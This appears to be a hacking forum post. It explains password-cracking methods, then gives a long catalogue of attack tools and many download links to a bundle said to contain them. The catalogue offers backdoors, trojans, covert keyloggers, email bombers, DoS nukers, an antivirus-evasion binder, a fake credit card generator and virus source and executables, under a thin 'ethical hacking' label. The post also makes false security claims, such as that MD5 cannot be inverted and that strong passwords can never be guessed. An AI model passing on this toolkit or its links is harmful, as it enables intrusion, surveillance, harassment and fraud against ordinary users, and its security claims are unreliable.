Password Hacking :-

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

    Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.


2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
    A password containing both uppercase &  lowercase characters, numbers and special characters too; is a strong password and can never be guessed.


Check Your Password Strength



3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
    Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
    Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
    Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Hacker Tools Tutorial

Students then learn how intruders escalate privileges and what steps can be taken to secure a system. Students also learn about intrusion detection, policy creation, social engineering, DDoS attacks, buffer overflows, and virus creation. When students leave this intensive five-day class, they will have hands-on understanding and experience in ethical hacking.

Chapter 1 - Introduction to Ethical Hacking
Chapter 2 - Footprinting
Chapter 3 - Scanning
Chapter 4 - Enumeration
Chapter 5 - System Hacking
Chapter 6 - Trojans and Backdoors
Chapter 7 - Sniffers
Chapter 8 - Denial of Service
Chapter 9 - Social Engineering
Chapter 10 - Session Hijacking
Chapter 11 - Hacking Web Servers
Chapter 12 - Web Application Vulnerabilities
Chapter 13 - Web Based Password Cracking Techniques
Chapter 14 - SQL Injection
Chapter 15 - Hacking Wireless Networks
Chapter 16 - Evading IDS, Firewalls and Honey Pots
Chapter 17 - Linux Hacking
Chapter 18 - Buffer Overflows
Chapter 19 - Cryptography
Chapter 20 - Virus and Worms
Chapter 21 - Physical Security
Chapter 22 - Penetration Testing


Extract the file and rename it to ISO



Code:

http://www.megaupload.com/?d=VOUDZCCD
http://www.megaupload.com/?d=S43BLLWQ
http://www.megaupload.com/?d=7BW82RQ3
http://www.megaupload.com/?d=FJTZNC39
http://www.megaupload.com/?d=HQJ26BGM
http://www.megaupload.com/?d=DN9JE0AL






Hacking Toolbox

Backdoor: Intrude computer and control the computer with client program.
Crack tool: Crack passwords of systems or applications, crack the serial numbers.
Disassembler: Disassemble the program with it. If you have a executable file, you can look the source code of this file with it.
DoS tool: Make computer stop to respond to any request with these tools, so other people can not access the computer.
Document: Documents about hacker, cracker, etc.
E-mail tool: Destroy the computer system using these tools, the tools are all related to e-mail. It includes several tools about e-mail, for example, email bomber, tool to find someone’s email address, etc.
Editor: Edit or modify your program with them.
Encryption & decryption tool: Encrypt files of almost any type using many strong cryptography algorithms.
Executable file tool: Manipulate executable files with these tools, bind some executable files, split one executable file, etc. So, for example, you can add one executable file to another one.
ICQ tool: Destroy the computer system using these tools, the tools are all related to ICQ. All programs in it work with ICQ. With the tools, you can do many things, for example, recovering ICQ’s password, sharing your files, and encrypting your ICQ messages, and so on.
Keylogger: Record keystrokes when the program is running, so you can get some useful information, for example, password.
MISC: Examine source code for security holes, hack games, and other interesting tools for both linux and windows.
Packet forging: Modify the data packet on network at will.
Phreak tool: Test the paging transmitters and systems, and so on, it includes box and wardialier.
Scanner: Acquire the system information, for example, open ports, OS, and so on.
Sniffer: Intercept and capture the data on the network.
Snoop tool: Show information of your system. For example, it can show IP address of your computer, or it can show SCSI and ATAPI devices in your system, and so on.
Source code: Source code of many tools.
Spoof: Bypass an HTTP proxy, keep your connection active, creates fake credit card numbers, ip spoof, etc.
Virus: Source code of virus and executable virus.


Backdoor

1. Back Orifice: Tools about back orifice.
2. Backdoor kit: Collection of many backdoor program.
3. Backdoor source: Source of backdoor program.
4. Minigift: Another backdoor program.
5. Net spy: Allow you to gain control of another computer using the internet.
6. Trojan: Control other people’s computer.


Crack tool

1. AMI Crack: Crack the Ami BIOS.
2. AMI Decoder: Crack the password of ami BIOS.
3. ARJ Cracker: Cracks password protected ARJ Files.
4. AW: Crack the password of BIOS.
5. Adv Office 2000 Password Recovery (pro): Crack the password.
6. Adv Office 2000 Password Recovery (std): Crack the password.
7. Advanced Archive Password Recovery: Crack the password of archive.
8. Advanced Excel 2000 Password Recovery: A program to recover lost or forgotten passwords to files/documents created in Mic*ft Excel.
9. Advanced NT Security Explorer: An application for Windows NT/2000/XP system administrators for finding holes in system security.
10. Advanced Outlook Express Password Recovery: Crack the outlook express password.
11. Advanced PDF Password Recovery Pro: Crack the PDF password.
12. Advanced Word 2000 Password Recovery: Crack the password of word 2000.
13. Advanced ZIP Password Recovery: Crack the password of zip.
14. Ami BIOS cracker: Crack password of ami BIOS.
15. BIOS / CMOS tools: Crack the password of BIOS and CMOS.
16. CryptoExplorer for Borland Paradox: Recover Borland Paradox passwords.
17. Dictionary: Used by cracker to crack the password.
18. Dictionary Maker: Makes dictionary files for password crackers.
19. FBRUTE: Crack unix password.
20. Hades cracker: Crack the password.
21. John The Ripper: Crack unix password.
22. Kill CMOS ver 1.00: Crack the password of CMOS.
23. L0phtCrack 2.01: Recover passwords for Windows NT.
24. Lilo crack: Crack password of lilo.
25. Linux crack: Crack password on linux.
26. Lotus 1-2-3 Password Recovery Key: 1-2-3 Key is a program to recover passwords for Lotus 1-2-3 documents.
27. Lotus Word Pro Password Recovery Key: Recover Lotus Word Pro Password.
28. MS Access Password Detection: Crack password of MS Access.
29. Mac crack: Crack password on Mac.
30. MailPassword: Recover lost password of e-mail.
31. MakePwl: Create the PWL files.
32. NtPassword: Find holes in system security.
33. PGP Crack: Crack the PGP.
34. PWLCRACK: Crack the PWL files.
35. PalmCrack 1.1: The password testing tool for the Palm Computing Platform.
36. Passware Kit: Recover the password.
37. Password Recovery Tools: Recover some passwords.
38. Password dictionaries: Used by cracker to crack the password.
39. PwlTools: Recover login password.
40. Quicken Password Recovery Key: Recover password.
41. Register: Register the software.
42. RemPass Ver 2.6: Crack password of BIOS.
43. SERIALS 2000: Crack the register code.
44. Serial number: Used by cracker to crack s/n.
45. THC-CUPASS: Crack password of user on a WindowsNT/W2K server.
46. THC-PrintDates: Crack password using date.
47. Unix password crackers: Crack passwords for unix.
48. Windows crack: Crack password on windows.
49. Windows password crackers: Crack password on windows.
50. Word List: Word dictionary.
51. WordPerfect Password Recovery Key: Recover passwords for WordPerfect document files.
52. Wzippwd: Creates valid serial number for Winzip.
53. ZIP Cracker: Cracks ZIP Files that are password protected.
54. iMesh Password Recovery: Recover a password installed in the iMesh client.
55. variation tool: Prepare the word list used by cracker to crack password.


Disassembler

1. ASMGEN: A program to generate cross-referenced assembly language code from any executable file.
2. Bubble Chamber: Disassemble executable files.
3. DoDi’s Visual Basic Tools: DoDi is a VB kit.
4. PROVIEW: Analyze and view system.
5. Windows Disassembler: Disassembe Windows executables and dynamic link libraries.


DoS tool

1. Black: Bomb someone’s computer with it.
2. IGMP Nuker: Bomb other’s computer with this popular tool.
3. Windows DoS kit: Attack computer systems with this useful tools.
4. pagebomb: Bomb windows pager with this tool.
5. windows95/98 patch: Patch you system in order to avoid attack by hackers.


Document

1. Article about hack: Introduce some knowledge about hack.
2. Article about hacker: Tell you how to become a hacker.
3. Articles about DoS: Describe what is DoS attack.
4. Articles about crack: Teach you how to crack.
5. Articles about programming: Introduce some knowledge about programming.
6. Aticles about hack: Narrate some knowledge about hack.
7. Books about hacking: Narrate some knowledge about hacking.
8. Books about linux: Introduce information about linux.
9. Books about network: Tell you knowledge about network.
10. Books about programming: Introduce some knowledge about programming.
11. Document about jargon: Tell you some about jargon.
12. Document about pbx: Introduce some pbx knowledge.
13. Document about phreaking: Introduce knowledge about phreaking.
14. Other documents: Introduce you some information.
15. Phrack Documents: Discuss some questions about phrack.
16. The Trojans Removal Database: Describe a lot of Trojan programs.


E-mail tool

1. Anima: Bomb some others’ computers with this tool(e-mail bomber).
2. Anonymous emailer: Send e-mail without being recognized.
3. Bomber: Bomb someone’s e-mail box with it.
4. E-mail bomber kit: Bomb some e-mail box with these tools.
5. Euthanasia: Bomb other’s e-mail address with this tool.
6. Extreme mailer: Bomb some victim’s e-mail address with it.
7. Haktek: Use this program to attack your victim or protect yourself from being hacked.
8. KaBoom!: Bomb other’s e-mail box.
9. Mail Bomb: Bomb your victim by this e-mail bomber.
10. News Mail Agent: Find any e-mail address in news groups.
11. Quick Fyre: QuickFyre is an anonymous emailer \ mail bomber.
12. Stealth Mailer: Send bombs to other people with this tool.
13. Unabomb: Send people email bombs.
14. Web Mail Agent: Find any e-mail address in the internet.


Editor

1. HEXCALIBUR: Examining, modify or otherwise manipulate disk files in their raw, or binary format.
2. HEXpert for Windows: Edit windows multi-format binary files.
3. Hex Workshop: Edit, insert, delete, cut, copy, and paste hex to your files.
4. Hexedit: Edit your raw files.
5. Hiew: Dump NE-executable file and dump LE/LX-executable file.
6. Script Hack Wizard: Allow you to hack or modify many language scripts with ease.
7. Support Files: Add the necessary files that script hack wizard uses to run.


Encryption & decryption tool

1. Apocalypso: Crypto tool from HNC.
2. Cryptonite Pro: Uses a superfast 64 bit encryption algorithm on Windows 95/98/Me.
3. EasyFP: Performs file encryption to protect your files and folders from being read by others.
4. Encryption: Encrypt your system information by four tools.
5. Encryption tools: Collecting a huge munber of encryption and decryption tools.
6. Encryptonite: Encrypt and decrypt text file with it easily.
7. HTML Encrypt: Encrypt your HTML/Script program.
8. Macintosh Encryption: Include various Macintosh encryption tools.
9. NetMangler: Encrypt your emails and protect yourself with NetMangler.
10. PC-Encrypt: Compress and encrypt almost any type of file.
11. PGPfreeware: Protect your email form unauthorized view.
12. WebPassword: Protect your web pages with password.
13. WinSafe: Encrypt your files with some powerful algorithms.


Executable file tool

1. Bound File Detector & Remover: Detect bound file with this tool.
2. Exe file tool: Manage the exe files with these tools.
3. Fusion: Enable static, virtual or dynamic linking, with sophisticated version control when using dynamic linking.
4. Multi Binder: Bind an unlimited number of files, of any EXE/BAT type.
5. Newjoiner: Avoid av detection.
6. PEBundle: Allow for DLLs or other files to be ??bundled?? with an executable file.
7. Topo: Scan all sections in order to find large ‘usable’ areas.
8. WinSplit: Split and join files with this tool.
9. inPEct: Bind 2 executables in one.
10. inPEct source code: Bind 2 executables in one.


ICQ tool

1. Advanced ICQ Password Recovery: Recover passwords to ICQ accounts.
2. Aquila: Recover your passwords with it.
3. ICQ Document: There are two documents about ICQ.
4. ICQ File Share: Share your files over the internet with your online friends.
5. ICQ MachineGun: Attack victim computer by ICQ.
6. ICQ kit: Attack your victim with these tools.
7. ICQr Information: Read and reveal personal information stored in Mirabilis ICQ Database (.DAT) files.
8. PGP-ICQ: Encrypt your ICQ messages.
9. SecureICQ: Allow you to encrypt messages you send and to decrypt encrypted messages you receive.
10. Send It Agent: Send very large data in no time to the ICQ users.
11. Source code about ICQ: Snoop ICQ traffic for a set host.


Keylogger

1. G2kBIOSspoof: Spoof BIOS password for gateway pc’s simply.
2. HookThis: Set a systemwide keyboard-hook.
3. Hooker: Make intelligent trojan keylogger module.
4. Invisible KeyLogger Stealth: Monitor computer activity to steal key information invisibly.
5. KeyGhost: Record keystrokes with tiny module that clips on to PC keyboard cable.
6. KeySpy: Spy program as a keyboard logger and a PC remote controller.
7. KeyTrap: Log keyboard key effectively!.
8. Keycopy: Keep a record of any keyboard activity on your computer.
9. Keylog: Include keylog tools such as Keylogwn, Keylog95, Keylog5 and Keylog25, IKS12d-m.
10. PC Acme: Monitor activity on PC and saves all information in the LOG files.
11. PC Acme Pro: Monitor software on PC and saves all information in the LOG files.
12. Phantom2: Record and playback a keystroke program for MS-DOS.
13. Playback!: Record the complete task and then play it back with one keystroke.
14. SKInNT: Monitoring program developed for Windows NT and Windows 2000.
15. Skin: Monitors kit of Skin5pro, Skin98as, Skint5, and Skin5 Demo.
16. Slog: Provide you with a log of what you have typed on your own computer for later review.


MISC

1. Game Hack: Having Game Wizard 32 and CrackAid, two tools.
2. HeadStrong WebClicker: Use public proxies to create artificial banner ad clicks.
3. Linux_misc: Collect many Linux misc tools with some source files as TCFS, SILC, DDNSF, St Jude, FreeVSD.
4. Misc: Include many misc of source codes and tools that can do such job as hijacking, monitoring, or interception, etc.
5. Quick Socket: Allow you administrator to chat (via keyboard) directly to a remote user also running Quick Socket.
6. Shutdown 2000: Disturb running application program.
7. Windows_misc: Contain all kinds of Windows misc tools, especially Wat, Stealth Proxy, Outlook Header Exp, WebClicker2.0, Ap2.74, etc.


Packet forging

1. Netcat: Reading and writing data utility across network connections using TCP or UDP protocol.
2. Packet_Forging: Include 21 files that are all used to create and send arbitrary packets on ethernet networks.
3. Packet_tool: Having other five packing tools as tcpkill, packetx1, msmh, LibnetNT, arpinject in the kit.
4. Pksnd102: Packing 16 files as Winpkt, Pktsend, Ndis3pkt, Dump, Dumy, Dis_pkt9 in it, among which are packed or executable files and source files of packet driver programs.
5. Raw IP Packet Capture/Creation Utility: Allow you free reign to directly forge the packet in any way you so desire.
6. Snot: Use snort rules files as its source of packet information.
7. Winject: Inject packet for Windows 9x, also called drugs for Windows.


Phreak tool

1. Auto Dial: Help you to use a war dialer easily.
2. Blue Dial: Make it easy to create and use different frequency settings for dialing.
3. Boxtone: Create phone tones.
4. CATCALL: Deal out a sentence from mildly annoying to downright galling.
5. CHaoS DeViCe: Call random pagers, puts in a phone number, hangs up, and goes all over again.
6. CPhreak: It is the first fone phreaking utility.
7. Dialing Demon: Wardialer.
8. Grim Scanner: Search for dial tones and carriers in the same call.
9. No Carrier: Scan with Dos shell, graphics and more!.
10. POCSAG Decoder: Allow the off-air decoding of POCSAG paging signals at 512, 1200 or 2400 bits/second.
11. Pageit: Page a billion different pagers and put in one number, or Page ONE pager and put in a billion numbers!.
12. PhoneTag: Check for starttime every second while it’s running.
13. Phreak box: Construct and use phreak box.
14. Super Dial: Call all of your town (or cities) phone numbers.
15. THC-SCAN: Scan phone-number areas with your modem.
16. The Little Operator: It is another wardialer.
17. Tone Loc Utilities: It is also a wardialer.
18. ToneLoc: Dials numbers, looking for some kind of tone with it.


Scanner

1. 7th Dimension Port Scanner: Scan your port address more easily.
2. AB Complete Ping: Allow you to ping one or more IP addresses, to scan a network for shared resources and to scan a computer for open ports.
3. Angry IP Scanner: Scan IP very easily and rapidly!.
4. Dave’s Port Sniffer: Detect FTP, HTTP, POP, SMTP, TELNET and FINGER deamons running on any TCP host machine.
5. DeadBolt: Monitor holes in Windows and alert you when it detects suspicious activity, giving you the power to stop viruses dead in their tracks!.
6. Linux-Vuln-source: Carry the two scanner as Rnmap and VLAD ’s system security kit!.
7. MacAnalysis: Audit suite for your Macintosh to perform and help implement a security standard for your computer/network by performing some work.
8. NetBIOS Security Kit(unix): Perform various security checks on remote servers running NetBIOS file sharing services.
9. NetBIOS Security Kit(windows): Perform various security checks on remote servers running NetBIOS file sharing services.
10. Netmon: Monitor network connections.
11. Nmap: Explore or security audit network on Linux or Unix.
12. Port Invader: Scan a range or list of IP addresses to verify if there are open or closed ports.
13. Port Scanner: Scan a group of IP address looking for the presence of specific incoming TCP/IP ports.
14. PortScan: Scan port fast and configurably!.
15. Port_Scanner: Collet 20 tools to use in port sacanner on Linux or Unix!.
16. Portscan SMS Alert: Alert you when probed scandlogd logs information to syslog and invokes this shell script.
17. Scanner: Collect 84 tools and misc to scan.
18. SecureScan NX: Scan your distributed network architecture for vulnerabilities from one central location.
19. SkPortScan ActiveX Control: Integrate port-scanning capabilities into your applications with this ActiveX control.
20. THC-HappyBrowser: Check an NT-Server/Webserver for known vulnerabilities.
21. THC-Probe: Scan compilation for Linux.
22. THC-Scan: Automate tone, carrier, vmb scanning.
23. WhereIsIP: Find the geographic location of chat room members, ICQ members, and more.
24. Windows_Trojan_Scanner: Collect 6 little tools scanning whole networks to find well known Trojans.
25. Windows_port_scanner: Collect 9 Port Scanner running on Windows.
26. XSharez scanner: Scan, search and get specific resources for you.


Sniffer

1. Blackbox for AOL: Monitor application for America Online, AIM, ICQ, and Yahoo Messenger.
2. Colasoft Application Protocol Sniffer & Analyzer: It is a TCP/IP Network Sniffer & Analyzer program based on Windows system.
3. Ethereal0814: Free network protocol analyzer’s another version.
4. Ethereal0817: Analyze network protocol, another version of Ethereal.
5. Ethereal0820: Analyze network protocol freely for Win32.
6. Libpcap062: Needed for capturing packet to you as the packet capture library, the latest release of Libpcap.
7. Linux_sniff_source: Contain 18 sniffer tools on Linux and some source files.
8. LittleBrother: Allow supervisors to accurately manage and measure internet and network resource usage.
9. NetProb32 Network Analyzer: Analyze, Monitor Traffic, and Generator Packet program.
10. PacketX: Integrate winpcap packet capture functionality with VB or any other programming environment supporting Mic*ft ActiveX technology.
11. Phenoelit’s own security sniffer: Open a network interface for all packets and not only for these packets, which are send to this interface.
12. Proxy Workbench: It is a unique proxy server ideal for developers, trainers and security experts that displays its data in real-time.
13. Snarp: Allow the host to sniff the data from the wire.
14. Sniff-em: Base on a competively priced, performance minded Windows as a Network analyzer.
15. Sniffers: Having 34 files in it and among that are 28 sniffer tools and some source codes.
16. Socket Workbench: Designed to analyze socket communications.
17. Stealth Activity Recorder: Use newly and easily internet enabled tool for monitoring home and business PCs.
18. Tcpdump362: Capture and dumper program pretty much for the original protocol packet.
19. Windows_sniff: Facilitate the capture and visualization of network traffic kit of 5 tools and 1 source code files.
20. Winpcap: Capture and send raw data from a network card, the free Packet Capture Architecture for Windows!.


Snoop tool

1. ID: Display the ID information of machine’s specific hardware.
2. IPQuery: Show the current IP Address.
3. NetroSnooper: Find hidden files on the internet!.
4. Network Inventory: Provide network administrators with the ability to perform a software inventory on all machines located on a network.
5. Quadsoft’s IP Tool: Tell you your IP Address in a variety of ways.
6. ShellSPY: Track every process running on your PC.
7. Trouble In Paradise: Install nothing but trouble your machine with some showing message.
8. iNetTools for Windows: Collect menu-driven testing tools for internet and IP-based networks.


Source code

1. APG: Set for random password generation.
2. ARP Monitor: Trace arp requests from/to your machine.
3. Asm: Including msmh, inpect, GetDialPasswords, it is a kit.
4. Backdoor: Includes 17 Backdoor tools in the kit with their source code.
5. Blue Beep: Blue Beep is a wardialer, this includes its source code.
6. C_SOURCE: Contain 4 files in it, and get the tools source code after decompress them.
7. Emailcrk: Crack password of e-mail account.
8. Findhost: Scan port on the net for you.
9. Harvester: Contain the source of Harvester, which monitors remote web pages and FTP directories.
10. IgmpNuke: Use IGMP packet tool’s source code.
11. Jail Chroot Project: Build a chrooted environment on POSIX with source code of C.
12. Keylogger_SRC: Include all the full source of Keylogger recording keystrokes.
13. Misc_src: Misc source code of 10 tools.
14. Network Grep: Mimick as much functionality in GNU grep as possible, applied at the network layer.
15. Nutcracker: Check/crack password tool for Unix/Linux.
16. PgpIcq: Encrypt your ICQ messages using the power of the world’s best encryption software.
17. Portscanner: Scan a group of IP address.
18. SecurityFocus ARIS Extractor: Analyze IDS log sophisticatedly and filter important attacks from the noise.
19. ShareDecryption: Extract share passwords from registry.
20. VB_SOURCE: Contain 14 files in it, and get the tools source code after decompress them.
21. Wnuke4: This is the complete wnuke4 source file package.
22. Zebedee: Secure IP tunnel tool’s source code!.


Spoof

1. Credit probe: Creates fake credit card numbers.
2. HTTPort: Establish a transparent TCP/IP tunnel through a proxy server.
3. IP Spoofer: Support IP spoofing software kit.
4. Ircgspoofer: Spoofer software on IRC Ghost.
5. Pinger: Trick your ISP into thinking you are always active.


Virus

1. Virus_exe: Including six most typical executable virus programs.
2. Virus_source: Containing many virus source codes in the package, this page will be devoted to Virii and Trojan’s, 89 files in all.

Backdoor


extract the file and rename it to ISO

Code:

http://www.megaupload.com/?d=Z3RK5G91
http://www.megaupload.com/?d=X3AQJ4P2
http://www.megaupload.com/?d=3NEGK6RJ
http://www.megaupload.com/?d=V2JMPQUY
http://www.megaupload.com/?d=FA2XYT4A
http://www.megaupload.com/?d=YZ9W0LA0
http://www.megaupload.com/?d=YJP8RZHT




No password required.
-------------------------------------------------------
Mirrors:
Code:

http://www.torrentz.com/torrent_862027.html


OR:


Ethical Hacker Tools

Code:

http://rapidshare.de/files/34833817/ht.part1.rar
http://rapidshare.de/files/34833858/ht.part2.rar
http://rapidshare.de/files/34833845/ht.part3.rar
http://rapidshare.de/files/34833655/ht.part4.rar
http://rapidshare.de/files/34833881/ht.part5.rar
http://rapidshare.de/files/34833908/ht.part6.rar
http://rapidshare.de/files/35181615/ht.part7.rar

or:

Code:

http://rapidshare.de/files/34835424/CEH.part04.rar
http://rapidshare.de/files/34835413/CEH.part06.rar
http://rapidshare.de/files/34835342/CEH.part03.rar
http://rapidshare.de/files/34835235/CEH.part07.rar
http://rapidshare.de/files/34835226/CEH.part02.rar
http://rapidshare.de/files/34835214/CEH.part05.rar
http://rapidshare.de/files/34835184/CEH.part01.rar
http://rapidshare.de/files/34835124/CEH.part08.rar

Hacking

EVERYONE Welcome to himanshuhacking..................